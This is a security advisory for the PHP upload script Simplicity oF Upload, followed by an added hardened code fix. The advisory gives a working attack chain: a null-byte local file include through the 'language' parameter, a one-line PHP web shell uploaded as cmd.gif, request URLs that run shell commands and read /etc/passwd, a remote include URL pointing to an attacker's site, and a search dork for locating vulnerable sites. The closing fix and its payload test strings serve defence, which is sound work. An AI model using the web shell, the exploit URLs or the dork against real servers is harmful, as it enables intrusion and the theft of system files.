Source:
http://www.phpsimplicity.com/scripts.php?id=3
remote command execution:
problem at lines 25-30 (of download.php, the script used in the URLs below):
...
//check for language overriding..
if (isset($_GET['language']))
$language = strtolower($_GET['language']);
//now we include the language file
require_once("$language.lng");
...
you can include any file by appending a null byte to the "language" parameter value: the %00 is decoded to a real NUL byte, and the C string that PHP hands to the filesystem ends there, so the ".lng" suffix is never seen (this needs magic_quotes_gpc off, otherwise the NUL is escaped to "\0", and a PHP older than 5.3.4, which started rejecting paths containing NUL bytes; note also that strtolower() runs first, so the name of the file you include must be all lowercase):
example:
http://localhost:30/simply/download.php?language=upload.php%00
you will see the upload and download pages rendered together :)
so you can upload a file named cmd.gif (uploading a .php file is pointless, it is usually renamed to .html, but the include does not care about the extension) containing this PHP code to execute commands:
<?php
// runs the shell command passed in the "command" GET parameter and echoes its output
// (the original advisory used $HTTP_GET_VARS, the pre-PHP 4.1 name for $_GET, removed in PHP 5.4)
system($_GET['command']);
?>
then request:
http://[target]/[path]/download.php?language=cmd.gif%00&command=ls
to list the current directory
http://[target]/[path]/download.php?language=cmd.gif%00&command=cat%20/etc/passwd
to display the /etc/passwd file
remote file inclusion (listed as cross site scripting in the original advisory):
also, since require_once() accepts URLs when allow_url_fopen is enabled (the default at the time; the separate allow_url_include switch only appeared in PHP 5.2), a remote user can supply a specially crafted URL that makes the target fetch and execute a page from a server he controls, for example to redirect other people to an evil page:
http://[target]/[path]/download.php?language=http://[evil_site]/[evil_page]%00
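As an added example that is not part of rgod's advisory or of the Simplicity oF Upload code: a hardened replacement for the include at lines 25-30, covering both the null-byte local include and the remote URL include described above. The function name resolve_language_file(), the list of language codes and the temporary directory used by the demo are assumptions.

```php
<?php
// Added example, not code from Simplicity oF Upload: a hardened replacement
// for the language-file include quoted in the advisory. The function name,
// the list of language codes and the demo directory layout are assumptions.
declare(strict_types=1);

// Language codes that actually ship with the application (assumed list).
const LANGUAGE_CODES = ['english', 'italian', 'french'];

/**
 * Map the untrusted ?language= value to an absolute path below $langDir,
 * or return null when it must not be included.
 *
 * The original did require_once("$language.lng") on the raw parameter, so
 *   upload.php%00            truncated the ".lng" suffix (PHP < 5.3.4),
 *   ../../../etc/passwd%00   walked out of the language directory, and
 *   http://evil/page%00      became a remote include with allow_url_fopen on.
 * Each of those is rejected here before anything touches the filesystem.
 */
function resolve_language_file(?string $param, string $langDir): ?string
{
    // Same default the application falls back to (assumed).
    $code = $param ?? 'english';

    // 1. Only a short lowercase word is acceptable. This single test rejects
    //    NUL bytes, slashes, dots and colons, and therefore every payload above.
    if (!preg_match('/^[a-z]{1,16}$/', $code)) {
        return null;
    }

    // 2. Allowlist: a well-formed code for a file that does not ship is
    //    still an error, not an invitation to include whatever exists.
    if (!in_array($code, LANGUAGE_CODES, true)) {
        return null;
    }

    // 3. Build the path from a fixed directory and a fixed extension, then
    //    confirm the resolved file really lives inside $langDir.
    $base = realpath($langDir);
    $path = realpath($langDir . '/' . $code . '.lng');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Demonstration on constructed inputs, shown the way PHP already presents
// them in $_GET (the %00 has been decoded to a real NUL byte).
$dir = sys_get_temp_dir() . '/simply_lang_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/english.lng', "<?php\n\$strings = ['title' => 'Upload'];\n");

$samples = [
    'english',
    "upload.php\0",
    "../../../etc/passwd\0",
    "cmd.gif\0",
    "http://evil.example/page\0",
];
foreach ($samples as $s) {
    $file = resolve_language_file($s, $dir);
    printf("%-30s => %s\n", addcslashes($s, "\0"), $file ?? 'REJECTED');
}

unlink($dir . '/english.lng');
rmdir($dir);

// In download.php the include then becomes:
//   $file = resolve_language_file($_GET['language'] ?? null, __DIR__ . '/lang');
//   if ($file === null) { http_response_code(400); exit('bad language'); }
//   require_once $file;
```

Only the first sample resolves; the four payloads are stopped by the character check before the allowlist or the filesystem is consulted. Renaming uploaded .php files to .html, as the application does, is no defence on its own: an include executes whatever extension it is handed, so the fix has to be on the include side.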
googledork:
"Powered By: Simplicity oF Upload"
rgod
email: rgod[at]autistici.org
site:
http://rgod.altervista.org
original advisory:
http://rgod.altervista.org/simply.html